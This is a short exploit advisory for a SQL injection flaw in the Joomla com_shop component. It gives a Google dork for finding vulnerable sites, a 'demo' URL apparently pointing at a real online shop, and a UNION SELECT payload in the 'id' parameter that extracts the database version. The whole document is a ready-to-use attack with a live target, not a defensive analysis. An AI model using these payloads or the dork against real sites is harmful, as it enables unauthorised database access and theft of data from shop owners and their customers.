The Joomla Shop component suffers from a remote SQL injection vulnerability.
dea0c4ae81ac87a5cf22c64787ef8dc31793ec3f3d133f2a259c882e8ddfaa20
################################################################################################
# Exploit Title: Joomla Component (com_shop) SQL Injection Vulnerability
#
# Author : CoBRa_21
#
# E-Mail : ghost1lover[at]hotmail.com
#
# Google Dork : inurl:index.php?option=com_shop
#
# Demo: https://www.blackmoneyclothing.com/index.php?option=com_shop&view=details&id=29
################################################################################################
#
# Exploit:
#
# https://127.0.0.1/index.php?option=com_shop&view=details&id=-29 (SQL)
#
# https://127.0.0.1/index.php?option=com_shop&view=details&id=-29 union select 0,1,2,version(),4,5,6,7,8,9,10,11,12
################################################################################################
# Pentester CoBRa_21 Thanks e-banka.org & cyber-warrior.org & AKINCILAR #
################################################################################################